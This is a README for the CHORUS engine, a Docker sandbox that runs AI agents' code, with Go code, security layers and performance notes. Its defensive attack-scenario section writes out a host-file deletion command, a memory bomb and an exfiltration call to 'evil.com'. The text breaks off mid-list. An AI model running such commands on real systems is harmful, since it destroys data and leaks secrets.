# CHORUS Task Execution Engine

**Secure, Isolated, and Lightning-Fast Code Execution for Autonomous Agents**

---

## Table of Contents

1. [Overview](#overview)
2. [For Everyone: The Big Picture](#for-everyone-the-big-picture)
3. [How It Works: Step by Step](#how-it-works-step-by-step)
4. [For Developers: Technical Deep Dive](#for-developers-technical-deep-dive)
5. [Security & Isolation](#security--isolation)
6. [Performance Characteristics](#performance-characteristics)
7. [Comparison: Why This Approach?](#comparison-why-this-approach)
8. [Available Development Environments](#available-development-environments)
9. [Real-World Examples](#real-world-examples)
10. [Troubleshooting & FAQ](#troubleshooting--faq)

---

## Overview

The **CHORUS Task Execution Engine** is the system that allows AI agents to safely execute code, build software, run tests, and produce artifacts, all without risking your host system. Think of it as giving the AI a completely isolated "workshop" where it can use real tools (compilers, interpreters, build systems) but can never accidentally damage anything outside that workspace.
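To make the "workshop" idea concrete, here is a minimal sketch (not CHORUS code) of the write rule that the workspace layout described later in this document implies: `/workspace/data` and `/workspace/output` are writable, while `/workspace/input` and the rest of the filesystem are read-only. The names `canWrite` and `under` are hypothetical and exist only for illustration; in the real engine this boundary is enforced by the container runtime, not by a path check.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// under reports whether p is root itself or lies below it.
func under(p, root string) bool {
	return p == root || strings.HasPrefix(p, root+"/")
}

// canWrite is a hypothetical helper: it reports whether a task would be
// allowed to write to the given container path under the documented layout.
func canWrite(p string) bool {
	// Normalise the path first so "../" tricks cannot escape a writable root.
	clean := path.Clean("/" + p)
	return under(clean, "/workspace/data") || under(clean, "/workspace/output")
}

func main() {
	for _, p := range []string{
		"/workspace/data/target/release/myapp",
		"/workspace/output/report.txt",
		"/workspace/input/src/main.rs",
		"/workspace/data/../../etc/passwd",
	} {
		fmt.Printf("%-40s writable=%v\n", p, canWrite(p))
	}
}
```

The path is cleaned before the prefix check so that a path such as `/workspace/data/../../etc/passwd` is evaluated as `/etc/passwd` and rejected.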

### Key Features

- ✅ **Complete Isolation** - Tasks run in containers that, by default, cannot access your host files or the network
- ✅ **Multi-Language Support** - Pre-configured environments for Rust, Go, Python, Node.js, Java, C/C++
- ✅ **Reproducible Builds** - Same environment every time, no "works on my machine" problems
- ✅ **Resource Limited** - Control CPU, memory, disk usage to prevent runaway processes
- ✅ **No SSH Required** - Direct API communication, no authentication complexity
- ✅ **Fast Command Startup** - Containers stay warm, so commands start in milliseconds once the container is running
- ✅ **Full Monitoring** - Track resource usage, capture all output, audit all actions

---

## For Everyone: The Big Picture

### The Problem We're Solving

When an AI agent needs to execute code, we face a dilemma:

```
┌─────────────────────────────────────────┐
│  Option 1: Run directly on your system  │
│  ✅ Fast                                │
│  ❌ Dangerous (AI could delete files)   │
│  ❌ Unpredictable (depends on your OS)  │
│  ❌ No resource limits                  │
└─────────────────────────────────────────┘

┌─────────────────────────────────────────┐
│  Option 2: Run in isolated environment  │
│  ✅ Safe (can't access your files)      │
│  ✅ Predictable (same environment)      │
│  ✅ Resource controlled                 │
│  ✅ Easy to reset if something breaks   │
└─────────────────────────────────────────┘
```

CHORUS chooses **Option 2** using Docker containers as secure, isolated workspaces.

### The Analogy: Virtual Workshop

Imagine hiring a contractor to build something:

**Traditional Approach (Unsafe):**

```
You: "Here are the keys to my house. Build me a bookshelf."
Contractor: *Has access to everything in your house*
```

**CHORUS Approach (Safe):**

```
You: "Here's a fully-equipped workshop in my garage."
     "All the tools you need are inside."
     "You can only access materials I put in the 'input' box."
     "Put the finished bookshelf in the 'output' box."
     "The workshop door locks from the outside; you can't leave."
Contractor: *Has everything needed, but can't access your house*
```

This is exactly what CHORUS does with code execution, except the "workshop" is a Docker container.

### Visual Overview

```
┌─────────────────────────────────────────────────────────────────┐
│                          CHORUS AGENT                           │
│    "I need to compile this Rust project and run tests"          │
└────────────────────────┬────────────────────────────────────────┘
                         │
                         ▼
┌─────────────────────────────────────────────────────────────────┐
│                      TASK EXECUTION ENGINE                      │
│  1. Detect language: "Rust"                                     │
│  2. Select image: anthonyrawlins/chorus-rust-dev                │
│  3. Create isolated container                                   │
│  4. Execute commands safely                                     │
└────────────────────────┬────────────────────────────────────────┘
                         │
                         ▼
┌─────────────────────────────────────────────────────────────────┐
│                  🐳 ISOLATED DOCKER CONTAINER                   │
│  ┌───────────────────────────────────────────────────────────┐  │
│  │  📁 /workspace/                                           │  │
│  │  ├── 📖 input/   (read-only: source code from user)       │  │
│  │  ├── 🔨 data/    (working: builds, temp files)            │  │
│  │  └── 📦 output/  (deliverables: binaries, reports)        │  │
│  │                                                           │  │
│  │  🔧 Pre-installed Tools:                                  │  │
│  │    • rustc (Rust compiler)                                │  │
│  │    • cargo (Rust build tool)                              │  │
│  │    • clippy (Rust linter)                                 │  │
│  │    • git, vim, curl, etc.                                 │  │
│  │                                                           │  │
│  │  🛡️ Security Boundaries:                                  │  │
│  │    • No network access (configurable)                     │  │
│  │    • No access to host files                              │  │
│  │    • Limited CPU: 2 cores                                 │  │
│  │    • Limited RAM: 2GB                                     │  │
│  │    • Non-root user: chorus (UID 1000)                     │  │
│  └───────────────────────────────────────────────────────────┘  │
└─────────────────────────────────────────────────────────────────┘
                         │
                         ▼
┌─────────────────────────────────────────────────────────────────┐
│                        RESULTS RETURNED                         │
│  ✅ Exit code: 0 (success)                                      │
│  📄 stdout: "Compiling myapp v0.1.0..."                         │
│  📄 stderr: "warning: unused variable..."                       │
│  📦 Artifacts: [myapp binary, test results]                     │
│  ⏱️ Duration: 45.3 seconds                                      │
│  💾 Memory used: 1.2GB / 2GB                                    │
└─────────────────────────────────────────────────────────────────┘
```

---

## How It Works: Step by Step

### Phase 1: Setup (happens once per task)

```
Step 1: Language Detection
┌─────────────────────────────────────────┐
│ Task: "Fix Rust compilation error"      │
│                                         │
│ Detection Logic:                        │
│   1. Check explicit language field      │
│   2. Check AI model name hints          │
│   3. Analyze repository URL patterns    │
│   4. Scan description for keywords      │
│                                         │
│ Result: Language = "rust"               │
└─────────────────────────────────────────┘
                    ↓
Step 2: Image Selection
┌─────────────────────────────────────────┐
│ Language: "rust"                        │
│                                         │
│ Image Map:                              │
│   rust   → chorus-rust-dev              │
│   go     → chorus-go-dev                │
│   python → chorus-python-dev            │
│   ...                                   │
│                                         │
│ Selected: anthonyrawlins/chorus-rust-dev│
└─────────────────────────────────────────┘
                    ↓
Step 3: Container Creation
┌─────────────────────────────────────────┐
│ Pull Image (if not cached):             │
│   docker pull anthonyrawlins/           │
│     chorus-rust-dev:latest              │
│                                         │
│ Create Container:                       │
│   • Image: chorus-rust-dev              │
│   • Memory: 2GB limit                   │
│   • CPU: 2 cores                        │
│   • Network: isolated (no internet)     │
│   • Filesystem: isolated                │
│                                         │
│ Keep-Alive Command:                     │
│   tail -f /dev/null                     │
│   (container stays running, ready for   │
│    commands, but does nothing actively) │
└─────────────────────────────────────────┘
```

### Phase 2: Execution (repeats for each command)

```
Step 4: Command Execution
┌─────────────────────────────────────────┐
│ Command: cargo build --release          │
│                                         │
│ Via Docker Exec API:                    │
│ POST /containers/{id}/exec              │
│ {                                       │
│  "Cmd": ["cargo", "build", "--release"],│
│  "WorkingDir": "/workspace/data",       │
│  "AttachStdout": true,                  │
│  "AttachStderr": true                   │
│ }                                       │
│                                         │
│ Response: exec_id = "abc123"            │
└─────────────────────────────────────────┘
                    ↓
Step 5: Stream Output
┌─────────────────────────────────────────┐
│ POST /exec/abc123/start                 │
│                                         │
│ Binary stream (multiplexed):            │
│   [stdout] Compiling myapp v0.1.0...    │
│   [stdout] Compiling deps v1.0.0        │
│   [stderr] warning: unused variable     │
│   [stdout] Finished release [opt]       │
│                                         │
│ CHORUS demultiplexes into separate      │
│ stdout and stderr buffers               │
└─────────────────────────────────────────┘
                    ↓
Step 6: Wait for Completion
┌─────────────────────────────────────────┐
│ Poll every 100ms:                       │
│   GET /exec/abc123/json                 │
│                                         │
│ Response:                               │
│   {                                     │
│     "Running": false,                   │
│     "ExitCode": 0,                      │
│     "Pid": 12345                        │
│   }                                     │
│                                         │
│ Command completed successfully!         │
└─────────────────────────────────────────┘
```

### Phase 3: File Operations

```
Writing Files (Code → Container)
┌─────────────────────────────────────────┐
│ Create tar archive in memory:           │
│                                         │
│   [tar header: "main.rs", size: 1024]   │
│   [file content: "fn main() { ... }"]   │
│                                         │
│ PUT /containers/{id}/archive            │
│ Target dir: /workspace/data/src         │
│ (file name comes from the tar header)   │
│                                         │
│ Result: File appears in container       │
└─────────────────────────────────────────┘

Reading Files (Container → Result)
┌─────────────────────────────────────────┐
│ GET /containers/{id}/archive            │
│ Path: /workspace/output/myapp           │
│                                         │
│ Response: tar stream                    │
│   [tar header: "myapp", size: 4194304]  │
│   [binary content: ELF executable]      │
│                                         │
│ Extract from tar → return to agent      │
└─────────────────────────────────────────┘
```

### Phase 4: Cleanup

```
Step 7: Resource Cleanup
┌─────────────────────────────────────────┐
│ When task completes:                    │
│                                         │
│ 1. docker stop {container_id}           │
│    (graceful shutdown: 30s timeout)     │
│                                         │
│ 2. docker rm {container_id}             │
│    (delete container completely)        │
│                                         │
│ 3. Remove temporary files on host       │
│                                         │
│ Result: Zero traces left behind         │
└─────────────────────────────────────────┘
```

---

## For Developers: Technical Deep Dive

### Architecture Components

```
┌───────────────────────────────────────────────────────────────────┐
│                        TaskExecutionEngine                        │
│  Location: pkg/execution/engine.go                                │
│                                                                   │
│  Responsibilities:                                                │
│    • Orchestrate task execution lifecycle                         │
│    • Coordinate between AI providers and sandboxes                │
│    • Parse AI responses for executable commands                   │
│    • Collect and format results                                   │
│    • Track metrics and resource usage                             │
└─────────────────────────────┬─────────────────────────────────────┘
                              │
                              │ creates
                              ▼
┌───────────────────────────────────────────────────────────────────┐
│                           ImageSelector                           │
│  Location: pkg/execution/images.go                                │
│                                                                   │
│  Responsibilities:                                                │
│    • Detect language from task context                            │
│    • Map language to appropriate Docker image                     │
│    • Provide image metadata and capabilities                      │
│                                                                   │
│  Detection Priority:                                              │
│    1. context.language field (explicit)                           │
│    2. AI model name hints                                         │
│    3. Repository URL patterns                                     │
│    4. Description keyword analysis                                │
└─────────────────────────────┬─────────────────────────────────────┘
                              │
                              │ provides image name
                              ▼
┌───────────────────────────────────────────────────────────────────┐
│                   ExecutionSandbox (Interface)                    │
│  Location: pkg/execution/sandbox.go                               │
│                                                                   │
│  Interface Methods:                                               │
│    • Initialize(ctx, config) error                                │
│    • ExecuteCommand(ctx, cmd) (*CommandResult, error)             │
│    • WriteFile(ctx, path, content, mode) error                    │
│    • ReadFile(ctx, path) ([]byte, error)                          │
│    • ListFiles(ctx, path) ([]FileInfo, error)                     │
│    • GetResourceUsage(ctx) (*ResourceUsage, error)                │
│    • Cleanup() error                                              │
└─────────────────────────────┬─────────────────────────────────────┘
                              │
                              │ implemented by
                              ▼
┌───────────────────────────────────────────────────────────────────┐
│                           DockerSandbox                           │
│  Location: pkg/execution/docker.go                                │
│                                                                   │
│  Key Fields:                                                      │
│    • client: *docker.Client (Docker SDK)                          │
│    • containerID: string (running container)                      │
│    • config: *SandboxConfig (resource limits, security)           │
│    • workingDir: string (default: /workspace/data)                │
│    • environment: map[string]string                               │
│                                                                   │
│  Implementation Details:                                          │
│    • Uses official Docker SDK for Go                              │
│    • Communicates via Unix socket /var/run/docker.sock            │
│    • Never spawns subprocesses (all via API)                      │
│    • Demultiplexes stdout/stderr from binary stream               │
│    • Streams files via tar archives                               │
└───────────────────────────────────────────────────────────────────┘
```

### Code Flow Diagram

```go
// 1. ENGINE RECEIVES TASK
func (e *DefaultTaskExecutionEngine) ExecuteTask(
	ctx context.Context,
	request *TaskExecutionRequest,
) (*TaskExecutionResult, error) {

	// 2. CREATE SANDBOX CONFIG
	// (body of e.createSandboxConfig(request), shown inline for clarity)
	imageSelector := NewImageSelector()
	selectedImage := imageSelector.SelectImageForTask(request)
	// Result: "anthonyrawlins/chorus-rust-dev:latest"

	sandboxConfig := &SandboxConfig{
		Image:      selectedImage,
		WorkingDir: "/workspace/data",
		Environment: map[string]string{
			"WORKSPACE_ROOT":   "/workspace",
			"WORKSPACE_INPUT":  "/workspace/input",
			"WORKSPACE_DATA":   "/workspace/data",
			"WORKSPACE_OUTPUT": "/workspace/output",
		},
		Resources: ResourceLimits{
			MemoryLimit: 2 * 1024 * 1024 * 1024, // 2GB
			CPULimit:    2.0,                    // 2 cores
		},
		Security: SecurityPolicy{
			NoNewPrivileges:  true,
			AllowNetworking:  false,
			DropCapabilities: []string{"ALL"},
		},
	}

	// 3. INITIALIZE SANDBOX
	sandbox := NewDockerSandbox()
	if err := sandbox.Initialize(ctx, sandboxConfig); err != nil {
		return nil, err
	}
	defer sandbox.Cleanup()

	// 4. EXECUTE COMMANDS
	cmd := &Command{
		Executable: "/bin/sh",
		Args:       []string{"-c", "cargo build --release"},
		WorkingDir: "/workspace/data",
		Timeout:    5 * time.Minute,
	}
	result, err := sandbox.ExecuteCommand(ctx, cmd)
	if err != nil {
		return nil, err
	}

	// 5. COLLECT ARTIFACTS
	var artifacts []TaskArtifact
	if result.ExitCode == 0 {
		binaryContent, err := sandbox.ReadFile(ctx, "/workspace/data/target/release/myapp")
		if err != nil {
			return nil, err
		}
		artifacts = append(artifacts, TaskArtifact{
			Name:    "myapp",
			Type:    "binary",
			Content: binaryContent,
			Size:    len(binaryContent),
		})
	}

	// 6. RETURN RESULTS
	return &TaskExecutionResult{
		Success:   result.ExitCode == 0,
		Output:    result.Stdout,
		Artifacts: artifacts,
		Metrics: &ExecutionMetrics{
			Duration:         result.Duration,
			CommandsExecuted: 1,
			ResourceUsage:    result.ResourceUsage,
		},
	}, nil
}
```

### Docker API Communication

**What Actually Happens Under the Hood:**

```
Host (CHORUS Process)            Docker Daemon
    │                               │
    │ Unix Socket Connection        │
    │ /var/run/docker.sock          │
    ├───────────────────────────────┤
    │                               │
    │ POST /v1.43/containers/create │
    │ {                             │
    │   "Image": "chorus-rust-dev", │
    │   "Cmd": ["tail","-f","/dev/null"],
    │   "HostConfig": {             │
    │     "Memory": 2147483648,     │
    │     "NanoCPUs": 2000000000,   │
    │     "CapDrop": ["ALL"]        │
    │   }                           │
    │ }                             │
    ├──────────────────────────────>│
    │                               │ Create container
    │<──────────────────────────────┤
    │ 201 Created                   │
    │ {"Id": "abc123def456..."}     │
    │                               │
    │ POST /v1.43/containers/       │
    │      abc123/start             │
    ├──────────────────────────────>│
    │                               │ Start container
    │<──────────────────────────────┤
    │ 204 No Content                │
    │                               │
    │ POST /v1.43/containers/       │
    │      abc123/exec              │
    │ {                             │
    │   "AttachStdout": true,       │
    │   "AttachStderr": true,       │
    │   "Cmd": ["cargo","build"]    │
    │ }                             │
    ├──────────────────────────────>│
    │                               │ Create exec instance
    │<──────────────────────────────┤
    │ 201 Created                   │
    │ {"Id": "exec789xyz..."}       │
    │                               │
    │ POST /v1.43/exec/exec789/start│
    ├──────────────────────────────>│
    │                               │ Execute command
    │<══════════════════════════════┤ (Binary stream)
    │ [stdout stream]               │ cargo output
    │ [stderr stream]               │ warnings
    │<══════════════════════════════┤
    │ Stream ends                   │
    │                               │
    │ GET /v1.43/exec/exec789/json  │
    ├──────────────────────────────>│
    │                               │ Check status
    │<──────────────────────────────┤
    │ {"Running": false,            │
    │  "ExitCode": 0}               │
    │                               │
    │ DELETE /v1.43/containers/     │
    │        abc123?force=true      │
    ├──────────────────────────────>│
    │                               │ Remove container
    │<──────────────────────────────┤
    │ 204 No Content                │
    │                               │
```

### Key Implementation Files

| File | Purpose | Key Functions |
|------|---------|---------------|
| `pkg/execution/engine.go` | Main orchestration | `ExecuteTask()`, `createSandboxConfig()`, `executeTaskInternal()` |
| `pkg/execution/images.go` | Image selection logic | `SelectImageForTask()`, `DetectLanguage()`, `detectLanguageFromDescription()` |
| `pkg/execution/sandbox.go` | Sandbox interface | Interface definitions for all sandbox implementations |
| `pkg/execution/docker.go` | Docker implementation | `Initialize()`, `ExecuteCommand()`, `WriteFile()`, `ReadFile()`, `Cleanup()` |

### Critical Code Sections

**1. Command Execution (docker.go:115-239)**

```go
func (d *DockerSandbox) ExecuteCommand(ctx context.Context, cmd *Command) (*CommandResult, error) {
	// Build the argv: executable followed by its arguments
	execCmd := append([]string{cmd.Executable}, cmd.Args...)

	// Create exec instance
	execConfig := container.ExecOptions{
		AttachStdout: true,
		AttachStderr: true,
		Cmd:          execCmd,
		WorkingDir:   cmd.WorkingDir,
		Env:          d.buildEnvironment(cmd.Environment),
	}
	exec, err := d.client.ContainerExecCreate(ctx, d.containerID, execConfig)
	if err != nil {
		return nil, fmt.Errorf("create exec: %w", err)
	}

	// Attach and stream output (no TTY, so stdout/stderr arrive multiplexed)
	resp, err := d.client.ContainerExecAttach(ctx, exec.ID, container.ExecAttachOptions{})
	if err != nil {
		return nil, fmt.Errorf("attach exec: %w", err)
	}
	defer resp.Close()

	// Demultiplex Docker's binary stream format
	var stdout, stderr bytes.Buffer
	if err := d.demultiplexOutput(resp.Reader, &stdout, &stderr); err != nil {
		return nil, fmt.Errorf("read output: %w", err)
	}

	// Poll for completion, giving up if the context is cancelled
	for {
		inspect, err := d.client.ContainerExecInspect(ctx, exec.ID)
		if err != nil {
			return nil, fmt.Errorf("inspect exec: %w", err)
		}
		if !inspect.Running {
			return &CommandResult{
				ExitCode: inspect.ExitCode,
				Stdout:   stdout.String(),
				Stderr:   stderr.String(),
			}, nil
		}
		select {
		case <-ctx.Done():
			return nil, ctx.Err()
		case <-time.After(100 * time.Millisecond):
		}
	}
}
```

**2. Output Demultiplexing (docker.go:876-915)**

Docker multiplexes stdout and stderr into a single binary stream with this format:

```
Byte 0:     Stream Type (1=stdout, 2=stderr)
Bytes 1-3:  Padding (always 0)
Bytes 4-7:  Frame Size (big-endian uint32)
Bytes 8+:   Frame Data
```

```go
func (d *DockerSandbox) demultiplexOutput(reader io.Reader, stdout, stderr io.Writer) error {
	header := make([]byte, 8)
	for {
		// Read exactly one 8-byte frame header; EOF here means the stream ended cleanly
		if _, err := io.ReadFull(reader, header); err != nil {
			if err == io.EOF {
				return nil
			}
			return err
		}

		// Bytes 4-7 hold the payload size as a big-endian uint32
		size := int64(binary.BigEndian.Uint32(header[4:8]))

		// Route the payload by stream type (byte 0)
		var dst io.Writer
		switch header[0] {
		case 1:
			dst = stdout
		case 2:
			dst = stderr
		default:
			dst = io.Discard // unknown stream type: skip the frame
		}

		// Copy exactly one frame, even if it spans several reads
		if _, err := io.CopyN(dst, reader, size); err != nil {
			return err
		}
	}
}
```

**3. Image Selection Logic (images.go:74-154)**

```go
func (s *ImageSelector) DetectLanguage(task *TaskExecutionRequest) string {
	// Priority 1: Explicit language field
	if lang, ok := task.Context["language"].(string); ok && lang != "" {
		return strings.ToLower(strings.TrimSpace(lang))
	}

	// Priority 2: Model name hints
	if task.Requirements != nil && task.Requirements.AIModel != "" {
		if modelLang := extractLanguageFromModel(task.Requirements.AIModel); modelLang != "" {
			return modelLang
		}
	}

	// Priority 3: Repository URL patterns
	// (only return on a match, so an inconclusive URL still falls through)
	if repoURL, ok := task.Context["repository_url"].(string); ok && repoURL != "" {
		if repoLang := detectLanguageFromRepo(repoURL); repoLang != "" {
			return repoLang
		}
	}

	// Priority 4: Description keyword analysis
	return detectLanguageFromDescription(task.Description)
}

func detectLanguageFromDescription(description string) string {
	keywords := []struct {
		language string
		patterns []string
		priority int
	}{
		// High priority - specific indicators
		{"rust", []string{"cargo.toml", "cargo build", ".rs file"}, 3},
		{"python", []string{"pip install", "pytest", "requirements.txt"}, 3},

		// Medium priority - generic mentions
		{"rust", []string{"rust"}, 2},
		{"python", []string{"python"}, 2},
	}

	lowered := strings.ToLower(description)
	bestMatch := ""
	bestPriority := 0

	for _, kw := range keywords {
		for _, pattern := range kw.patterns {
			if strings.Contains(lowered, pattern) && kw.priority > bestPriority {
				bestMatch = kw.language
				bestPriority = kw.priority
			}
		}
	}

	if bestMatch == "" {
		return "base" // No match: fall back to the generic image
	}
	return bestMatch
}
```

---

## Security & Isolation

### Defense in Depth: Multiple Security Layers

```
┌──────────────────────────────────────────────────────────────────┐
│  Layer 1: Linux Kernel Namespaces                                │
│  ──────────────────────────────────────────────────────────────  │
│  • PID Namespace: Container can't see host processes             │
│  • Network Namespace: Isolated network stack (default: no net)   │
│  • Mount Namespace: Container can't see host filesystem          │
│  • IPC Namespace: No shared memory with host                     │
│  • UTS Namespace: Separate hostname                              │
│  • User Namespace: UID mapping (if userns-remap is enabled)      │
└──────────────────────────────────────────────────────────────────┘
                                 ↓
┌──────────────────────────────────────────────────────────────────┐
│  Layer 2: Control Groups (cgroups)                               │
│  ──────────────────────────────────────────────────────────────  │
│  • Memory Limit: 2GB hard limit (OOM kill if exceeded)           │
│  • CPU Limit: 2 cores maximum                                    │
│  • PID Limit: 100 processes maximum                              │
│  • Block I/O: Rate limiting on disk operations                   │
│  • No access to host's /sys, /proc                               │
└──────────────────────────────────────────────────────────────────┘
                                 ↓
┌──────────────────────────────────────────────────────────────────┐
│  Layer 3: Linux Capabilities                                     │
│  ──────────────────────────────────────────────────────────────  │
│  Dropped Capabilities (CapDrop: ALL):                            │
│    • CAP_SYS_ADMIN: Can't modify system settings                 │
│    • CAP_NET_ADMIN: Can't modify network configuration           │
│    • CAP_SYS_MODULE: Can't load kernel modules                   │
│    • CAP_SYS_RAWIO: Can't access raw I/O                         │
│    • ALL other capabilities dropped                              │
│                                                                  │
│  Added Capabilities (minimal):                                   │
│    • None by default                                             │
│    • NET_BIND_SERVICE only if networking enabled                 │
└──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 4: Seccomp (Secure Computing Mode) │ │ ─────────────────────────────────────────────────────────────── │ │ Blocked System Calls: │ │ • reboot, swapon, swapoff │ │ • mount, umount (filesystem manipulation) │ │ • kexec_load (kernel execution) │ │ • ptrace (process debugging/manipulation) │ │ • 300+ other dangerous syscalls │ └──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 5: AppArmor / SELinux (MAC) │ │ ─────────────────────────────────────────────────────────────── │ │ Mandatory Access Control profiles: │ │ • Restrict which files can be read/written │ │ • Block access to sensitive host paths │ │ • Prevent privilege escalation │ └──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 6: Read-Only Root Filesystem │ │ ─────────────────────────────────────────────────────────────── │ │ • Root filesystem mounted read-only │ │ • Only /workspace/* is writable │ │ • No modification of system binaries │ │ • No installation of packages (use pre-built images) │ └──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 7: Network Isolation │ │ ─────────────────────────────────────────────────────────────── │ │ Default: NetworkMode = "none" │ │ • No network interfaces (except loopback) │ │ • Can't make outbound connections │ │ • Can't receive inbound connections │ │ • Configurable if task requires network │ └──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 8: Non-Root User │ │ ─────────────────────────────────────────────────────────────── │ │ • Runs as user 
"chorus" (UID 1000) │ │ • Not in sudoers │ │ • No password authentication │ │ • Can't escalate to root (no-new-privileges flag) │ └──────────────────────────────────────────────────────────────────┘ ``` ### Security Configuration (Code) ```go // pkg/execution/docker.go:558-641 func (d *DockerSandbox) buildHostConfig() *container.HostConfig { return &container.HostConfig{ // Resource Limits Resources: container.Resources{ Memory: 2 * 1024 * 1024 * 1024, // 2GB NanoCPUs: 2000000000, // 2 cores PidsLimit: ptr(100), // 100 processes max }, // Security Options SecurityOpt: []string{ "no-new-privileges:true", // Prevent privilege escalation "seccomp=/etc/docker/seccomp.json", // Syscall filtering "apparmor=docker-default", // AppArmor profile }, // Capabilities (drop all by default) CapDrop: []string{"ALL"}, CapAdd: []string{}, // Add none unless specifically needed // Network Isolation NetworkMode: "none", // No network access // Filesystem Security ReadonlyRootfs: true, // Read-only root // Process Isolation IpcMode: "private", // No shared IPC PidMode: "private", // Can't see host processes // Never privileged Privileged: false, } } ``` ### What Can and Cannot Happen | Action | Possible? | Why? 
| |--------|-----------|------| | **Read host files** | ❌ No | Mount namespace isolation | | **Write host files** | ❌ No | Mount namespace isolation | | **See host processes** | ❌ No | PID namespace isolation | | **Access host network** | ❌ No | Network namespace = "none" | | **Use more than 2GB RAM** | ❌ No | OOM killer terminates process | | **Use more than 2 CPU cores** | ❌ No | CFS scheduler throttles | | **Spawn 1000 processes** | ❌ No | PID limit = 100 | | **Load kernel modules** | ❌ No | CAP_SYS_MODULE dropped | | **Reboot system** | ❌ No | Seccomp blocks reboot syscall | | **Escalate to root** | ❌ No | no-new-privileges flag | | **Compile code** | ✅ Yes | Compiler included in image | | **Run tests** | ✅ Yes | Test frameworks pre-installed | | **Read /workspace/input** | ✅ Yes | Mounted read-only | | **Write to /workspace/data** | ✅ Yes | Working directory | | **Create artifacts in /workspace/output** | ✅ Yes | Output directory | ### Real-World Attack Scenarios (and how we prevent them) **Scenario 1: Malicious Code Tries to Delete Host Files** ```bash # Malicious command attempted by compromised AI rm -rf /host/important_data # What actually happens: # ❌ /host/important_data doesn't exist in container namespace # ✅ Even if it did, read-only root filesystem prevents deletion # ✅ Mount namespace prevents access to host paths # Result: Command fails harmlessly ``` **Scenario 2: Infinite Loop Consumes All CPU** ```rust // Malicious code loop { // Busy loop attempting to DoS host let x = 1 + 1; } // What actually happens: // ✅ CFS scheduler limits to 2 cores maximum // ✅ Host system still has remaining cores available // ✅ Timeout kills container after 5 minutes // Result: Host remains responsive ``` **Scenario 3: Memory Bomb Attempts to Crash System** ```python # Malicious code data = [] while True: data.append('x' * 10000000) # Allocate 10MB per iteration # What actually happens: # ✅ Memory limit = 2GB enforced by cgroups # ✅ When exceeded, OOM killer 
terminates process # ✅ Host memory unaffected # Result: Container terminated, host protected ``` **Scenario 4: Attempts Network Exfiltration of Data** ```go // Malicious code http.Post("http://evil.com/steal", "application/json", secretData) // What actually happens: // ❌ No network interfaces available (NetworkMode="none") // ❌ Can't resolve DNS // ❌ Can't create TCP connections // Result: Network call fails immediately ``` --- ## Performance Characteristics ### Startup Times ``` ┌─────────────────────────────────────────────────────────────┐ │ Operation Time Notes │ ├─────────────────────────────────────────────────────────────┤ │ Image pull (first time) 30-120s One-time cost │ │ Image pull (cached) 0ms Already local │ │ Container creation 200-500ms Create config │ │ Container start 100-300ms Process spawn │ │ First exec command 10-50ms Setup overhead │ │ Subsequent exec commands 5-15ms Amortized │ │ File copy (1MB) 20-50ms Tar streaming │ │ Container stop & remove 100-200ms Graceful │ └─────────────────────────────────────────────────────────────┘ Total for "Hello World" task: 400-850ms (cached image) Total for Rust compilation: 45-120s (depends on project size) ``` ### Resource Overhead ``` Component Memory Overhead CPU Overhead ───────────────────────────────────────────────────────── Docker daemon 50-100MB 1-2% idle Container runtime 20-50MB <1% idle Executing process Actual + 10-20MB Actual + 2-3% CHORUS orchestration 30-50MB 1-2% ───────────────────────────────────────────────────────── Total overhead ~150MB ~5% ``` ### Comparison: Different Execution Models ``` ┌──────────────────────────────────────────────────────────────────┐ │ Metric │ Docker Exec │ New Container │ SSH │ Native │ │ │ (CHORUS) │ Per Command │ │ │ ├──────────────────────────────────────────────────────────────────┤ │ Startup Time │ 400ms │ 2-5s │ 50ms │ 0ms │ │ Command Latency │ 10ms │ N/A │ 30ms │ 0ms │ │ Memory Overhead │ 150MB │ 200MB │ 100MB│ 0MB │ │ File Persistence │ ✅ Yes │ ❌ No │ 
✅ Yes│ N/A │ │ Security Isolation│ ✅ Full │ ✅ Full │ ⚠️ Partial│❌ None│ │ Setup Complexity │ ⭐ Low │ ⭐ Low │ ⭐⭐⭐ High│⭐ Low │ │ State Between Cmds│ ✅ Yes │ ❌ No │ ✅ Yes│ N/A │ │ API vs CLI │ ✅ API │ ⚠️ CLI │ ⚠️ CLI│ N/A │ └──────────────────────────────────────────────────────────────────┘ Winner: Docker Exec (CHORUS approach) ✨ • Persistent state between commands • Low latency after warmup • Full isolation • No authentication complexity • Direct API access (no CLI parsing) ``` ### Performance Optimization Strategies **1. Container Warmup** ```go // Container stays alive between commands Cmd: []string{"tail", "-f", "/dev/null"} // Benefits: // • No restart overhead // • Cached filesystem state // • Amortized startup cost ``` **2. Image Pre-pulling** ```bash # Pre-pull on cluster nodes docker pull anthonyrawlins/chorus-rust-dev:latest docker pull anthonyrawlins/chorus-go-dev:latest docker pull anthonyrawlins/chorus-python-dev:latest # Result: Zero pull time during task execution ``` **3. Layer Caching** ```dockerfile # All language images share base layer FROM debian:bookworm AS base # Base layer: 643MB (shared across all images) FROM base AS rust-dev # Only Rust-specific layers downloaded # Effective size: ~1.8GB additional ``` **4. Efficient File Transfer** ```go // Use tar streaming (not individual file copies) buf := new(bytes.Buffer) tw := tar.NewWriter(buf) // Add multiple files to single tar // Transfer entire archive in one API call ``` --- ## Comparison: Why This Approach? ### Alternative 1: SSH into Container ``` ┌─────────────────────────────────────────────────────────────┐ │ How it would work: │ │ 1. Install openssh-server in container │ │ 2. Generate SSH keys │ │ 3. Start sshd daemon │ │ 4. SSH from CHORUS to container │ │ 5. 
